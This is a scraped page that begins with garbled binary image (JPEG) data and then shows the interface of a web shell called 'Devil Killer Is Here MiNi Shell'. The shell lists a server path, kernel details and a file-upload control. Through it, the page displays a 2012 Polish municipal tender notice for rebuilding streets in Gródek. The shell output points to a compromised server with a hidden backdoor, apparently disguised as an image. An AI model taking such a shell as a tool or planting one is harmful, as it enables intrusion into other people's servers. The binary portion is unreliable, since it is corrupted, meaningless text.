JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120217/49042-N-2012.html

<p class="kh_header"><b>Gródek: Przebudowa odcinków ulic w Gródku: ul. Rzemieślniczej w ciągu drogi gminnej Nr 105065B i ul. Białostockiej w ciągu drogi powiatowej Nr 1448B.</b><br>
<b>Numer ogłoszenia: 49042 - 2012; data zamieszczenia: 17.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gródek , ul. A. i G. Chodkiewiczów 2, 16-040 Gródek, woj. podlaskie, tel. 085 7180664, faks 085 7180684.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grodek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa odcinków ulic w Gródku: ul. Rzemieślniczej w ciągu drogi gminnej Nr 105065B i ul. Białostockiej w ciągu drogi powiatowej Nr 1448B..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ DROGOWA UL. BIAŁOSTOCKA: 1. Odtworzenie trasy i punktów wysokościowych dróg z przeniesieniem punktów osnowy geodezyjnej w ilości 1,04 km; 
2. Rozebranie nawierzchni z betonu, gr. nawiezrchni 15 cm	w ilości	20,7 m2; 
3. Rozebranie nawierzchni z brukowca, gr. brukowca 16-20 cm, w ilości 7574 m2;
4. Rozebranie nawierzchni z płyt drogowych betonowych (trylinki), gr. 12 cm, spoiny wypełnione piaskiem w ilości 434	m2; 
5. Rozebranie chodników z płyt betonowych o wym. 35x35x5 cm, ułożonych na podsypce piaskowej w ilości 266 m2;
6. Rozebranie chodników z płyt betonowych o wym. 50x50x7 cm, ułożonych na podsypce piaskowej w ilości 1790	m2; 
7. Rozebranie nawierzchni z kostki brukowej betonowej, ułozonej na podsypce cementowo-piaskowej w ilości 303 m2; 
8. Rozebranie krawężników betonowych, ułożonych na podsypce cementowo-piaskowej w ilości 1794 m; 
9. Rozebranie obrzeży betonowych w ilości 1130 m; 
10. Rozebranie ław podkrawężnikowych z betonu w ilości 89,7 m3; 
11. Wykonanie wykopów mechanicznie w gruncie  z transportem urobku na nasyp wraz z zagęszczeniem gruntów w nasypie i zwilżeniem w miarę potrzeby warstw zagęszczanych wodą w ilości  2560 m3; 
12. Roboty ziemne poprzeczne na przerzut wykonane ręcznie z wbudowaniem ziemi w nasyp, wraz z zagęszczeniem i zwilżeniem w miarę potrzeby warstw zagęszczanych wodą w ilości 34	m3; 
13. Regulacja pionowa studzienek rewizyjnych, nadbudowa wykonana betonem w ilości 25	szt;
14. Regulacja pionowa studzienek dla zaworów wodociągowych lub gazowych, nadbudowa wykonana betonem w ilości 17 szt; 
15. Regulacja pionowa studzienek telefonicznych, nadbudowa wykonana betonem	w ilości	9 szt; 
16. Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni wykonane ręcznie w ilości 2895	m2; 
17. Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni wykonane mechanicznie	w ilości	8158 m2; 
18. Wykonanie podbudowy z kruszywa naturalnego, warstwa dolna, gr. warstwy 20 cm w ilości 7515	m2; 
19. Wykonanie podbudowy z kruszywa naturalnego, warstwa dolna, gr. warstwy 15 cm w ilości 643	m2; 
20. Wykonanie podbudowy z kruszywa naturalnego, warstwa górna, gr. warstwy 15 cm	w ilości	662 m2; 
21. Wykonanie podbudowy z kruszywa naturalnego, warstwa górna, gr. warstwy 10 cm	w ilości	1264,5	m2; 
22. Wykonanie podbudowy z przekruszonego betonu i kamienia, warstwa górna gr. warstwy  20 cm	w ilości	6250 m2;
23. Wykonanie podbudowy z betonu asfaltowego, gr warstwy 9 cm	w ilości	7489 m2; 
24. Skropienie warstw konstrukcyjnych emulsją asfaltową 	w ilości	7475 m2; 
25. Wykonanie nawierzchni z betonu asfaltowego, AC 11 S, warstwa ścieralna, grubość w-wy 5 cm  w ilości 7351 m2; 
26. Wykonanie frezowania nawierzchni asfaltowych na zimno, śr. gr. 4 cm	w ilości 7577 m2; 
27. Wykonanie frezowania nawierzchni asfaltowych na zimno, śr. gr. 5 cm	w ilości 7574 m2; 
28. Wykonanie nawierzchni z kostki brukowej o gr. 8 cm, szarej na podsypce cementowo-piaskowej, spoiny wypełnione piaskiem w ilości	31 m2; 
29. Wykonanie nawierzchni z kostki brukowej koloru ceglastego o gr. 8 cm na podsypce piaskowej, spoiny wypełnione piaskiem	w ilości	662 m2; 
30. Oznakowanie poziome jezdni farbą akrylową białą, linie na skrzyżowaniach i przejściach dla pieszych, malowane mechanicznie	w ilości	88 m2; 
31. Ustawienie słupków z rur stalowych fi 70 mm dla znaków drogowych, wraz z wykonaniem i zasypaniem dołów z ubiciem warstwami w ilości 9 szt;
32. Przymocowanie do gotowych słupków znaków ostrzegawczych typ A (trójkątny o boku 900 mm), folia odblaskowa II generacji w ilości 1 szt; 
33. Przymocowanie do gotowych słupków znaków informacyjnych typ D (kwadratowych 600x600), folia odblaskowa II generacji w ilości 12	szt; 
34. USTAWIENIE KRAWĘŻNIKÓW BETONOWYCH O WYM. 20x30 CM NA ŁAWIE BETONOWEJ w ilości 1838 m
35. WYKONANIE CHODNIKÓW Z KOSTKI BRUKOWEJ BETONOWEJ, GR. 6 CM, szarej 	w ilości	2125 m2; 
36. WYKONANIE CHODNIKÓW Z KOSTKI BRUKOWEJ BETONOWEJ, GR. 6 CM, koloru ceglastego  w ilości 39	m2; 
37. USTAWIENIE OBRZEŻY BETONOWYCH O WYM. 20X6 CM w ilości 1512 m; 
38. USTAWIENIE OBRZEŻY BETONOWYCH O WYM. 30X8 CM  w ilości 386 m.  
KANALIZACJA DESZCZOWA UL. BIAŁOSTOCKA: 
1. Rozebranie przepustu z rur betonowych śr. 60 cm w ilości 11 m; 
2. Demontaż rurociągu betonowego o śr. 200 mm	w ilości	16,7 m; 
3. Rozebranie ścianek czołowych przepustów w ilości 0,84 m3; 
4. Demontaż studzienek ściekowych w ilości 11 kpl.; 
5. Wykonanie kanalizacji deszczowej z rur PP o śr. 50 cm	w ilości	170 m; 
6. Wykonanie kanalizacji deszczowej z rur PP o śr. 45 cm	w ilości	176	m
7. Wykonanie kanalizacji deszczowej z rur PP o śr. 40 cm	w ilości	412	m
8. Wykonanie kanalizacji deszczowej z rur PP o śr. 31,5 cm	w ilości	547	m
9. Wykonanie przykanalików z rur PP o śr. 20 cm w ilości 243 m; 
10. Wykonanie studni rewizyjnych o śr. 1,2m w ilości 32 szt.; 
11. Wykonanie studni rewizyjnych o śr. 1,5m w ilości 1 szt.; 
12. Wykonanie studzienek ściekowych w ilości 60	szt.; 
13. Wylot kanału	w ilości	2,07 m3; 
14. Osadnik wirowy typ V2 B1-9	w ilości	1 szt.; 
15. Ocieplenie wodociągu żużlem lub keramzytem w ilości 17 m; 
16. Montaż rur osłonowych Arot	w ilości	12 m; 
17. Montaż i demontaż podwieszeń kabli	w ilości	14 kpl.; 
18. Montaż i demontaż podwieszeń rurociągów w ilości 26	kpl.  
CZĘŚĆ DROGOWA UL. RZEMIEŚLNICZA:  
1. Odtworzenie trasy i punktów wysokościowych dróg z przeniesieniem punktów osnowy geodezyjnej w ilości 1,1	km; 
2. Rozebranie nawierzchni z mas minerlano-bitumicznych gr. 6 cm w ilości 2204 m2; 
3. Wykonanie wykopów mechanicznie w gruncie  z transportem urobku na odkład	w ilości	765 m3; 
4. Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni wykonane ręcznie w ilości 6110 m2; 
5. Podbudowa z kruszywa łamanego, warstwa dolna gr. 20 cm w ilości 3300 m2;
6. Wyrównanie istniejącej podbudowy betonem asfaltowym w ilości	518 t; 
7. Oczyszczenie mechaniczne podbudowy	w ilości	6221 m2; 
8. Skropienie asfaltem podbudowy w ilości	 6221 m2; 
9. Wykonanie nawierzchni z betonu asfaltowego, AC 11 S, warstwa ścieralna, grubość w-wy 5 cm  w ilości 6876 m2; 
10. Zjazdy żwirowe, gr. 20 cm w ilości 359 n2; 
11. Pobocza żwirowe, gr. 12 cm	w ilości	2452 m2; 
12. Założenie rur osłonowych dwudzielnych śr. 110 mm na istniejące kable telekomunikacyjne w ilości 44 m; 
13. Założenie rur osłonowych dwudzielnych typu AROT A110 PS na istniejące kable 
energetyczne	w ilości	57 m; 
14. Renowacja i oczyszczenie rowów przydrożnych w ilości	 2204 m.  
Oznakowania i zabezpieczenia robót zgodnie z obowiązującymi przepisami dokona Wykonawca robót. Gruz z  rozbiórek Wykonawca zadania zabezpieczy we własnym zakresie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.51-8, 45.23.31.40-2, 45.23.32.22-1, 45.23.32.52-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferent zapewni jako część swojej oferty wadium w wysokości 33 000,00 zł (słownie: trzydzieści trzy tysiące złotych).  W zależności od wyboru Oferenta, wadium może być wniesione w:                                                
1) pieniądzu na konto zamawiającego: Bank Spółdzielczy Białystok O/Gródek 45 8060 0004 0390 0127 2000 0040. Wadium uznaje się za wpłacone w terminie, jedynie pod warunkiem, że pieniądze znajdą się na koncie zamawiającego przed upływem terminu złożenia ofert;                                                                                                              2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;                                                                                                              3) gwarancjach bankowych;                                                                                                                4) gwarancjach ubezpieczeniowych;                                                                                                   
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6  b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zmianami).

W przypadku wniesienia wadium w formie innej niż pieniężna - oryginał dokumentu potwierdzającego wniesienie  wadium należy przesłać/złożyć do zamawiającego wraz z ofertą umieszczając w osobnej kopercie wewnątrz ofert, z zaznaczeniem (Oryginał wadium przetargowego) w terminie określonym do składania ofert, natomiast kserokopię poświadczoną przez Wykonawcę za zgodność z oryginałem należy dołączyć jako dokument do oferty.
Zamawiający dokona zwrotu wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania , z wyjątkiem wykonawcy , którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem punktu poniżej. 
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli  Wykonawca  w odpowiedzi na wezwanie o którym mowa w art.26 ust.3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ww. ustawy , lub pełnomocnictw, chyba ze udowodni, że wynika to z przyczyn nieleżących po jego stronie.                                                                                                              Wykonawcy, którego oferta została wybrana jako najkorzystniejsza zamawiający zwraca wadium  niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
Wykonawca, którego oferta zostanie wybrana utraci wadium wraz z odsetkami na rzecz Zamawiającego,  jeżeli: 
1) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,                                                                                                                2) nie wniesie wymaganego zabezpieczenia należytego wykonania umowy,                                                                                                               3) zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie oferenta.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wzynacza szczególowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem, w wykonaniu (zakończeniu) w okresie ostatnich 5 lat   przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 3 robót budowlanych polegających na przebudowie ulic(wykonanie nawierzchni bitumicznej i chodników) o wartości min. 2 000 000,00 zł brutto każde zadanie oraz 3 robót polegających na wykonaniu kanalizacji deszczowej na długości 500 m na każdym zadaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Wykonawca powinien posiadać lub mieć dostęp do wytwórni mas bitumicznych posiadającej certyfikat zakładowej kontroli produkcji zlokalizowanej w odległości nie większej niż 80 km od miejsca wbudowania masy tj m. Gródek.  
2) wykonawca powinien posiadać lub mieć dostęp do laboratorium wykonującego badania laboratoryjne w trakcie wykonywania zamówienia.  
3) wykonawca powinien posiadać lub mieć dostęp do oznakowania i zabezpieczenia robót prowadzonych w pasie drogowym, zgodnie z:- załącznikiem 1 i 4 do rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003 r. Nr 220 poz. 2181), - rozporządzeniem Ministra Infrastruktury z dnia 23 września 2003 r. (Dz. U. z 2003 r. Nr 177 poz. 1729).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował osobami, które będą uczestniczyć     w wykonywaniu zamówienia, legitymującymi się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem odpowiednimi do funkcji, jakie zostaną im powierzone. Wykonawca przedstawi wraz z ofertą osoby,  które spełniają następujące wymagania:
- jedna osoba proponowana do pełnienia funkcji kierownika budowy: minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie: - min. 2 lata doświadczenia przy budowie lub przebudowie dróg na stanowisku kierownika budowy lub kierownika robót drogowych, posiadanie uprawnień budowlanych do kierowania robotami w specjalności drogowej (bez ograniczeń) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie obowiązujących przepisów, przynależność do Okręgowej Izby Inżynierów Budownictwa; 
- jedna osoba proponowana do pełnienia funkcji kierownika robót kanalizacyjnych    i wodociągowych: minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie: - min. 2 lata doświadczenia przy budowie lub przebudowie kanalizacji  na stanowisku kierownika budowy lub kierownika robót kanalizacyjnych, posiadanie uprawnień budowlanych do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych , gazowych, wodociągowych  i kanalizacyjnych (bez ograniczeń) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie obowiązujących przepisów, przynależność do Okręgowej Izby Inżynierów Budownictwa;   
- obsługa geodezyjna min 1 osoba posiadająca, uprawnienia: geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne i inwentaryzacyjne</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien posiadać opłaconą polisę ubezpieczeniową, a przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej na sumę nie niższą niż 1 000 000,00 PLN w zakresie prowadzonej działalności.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
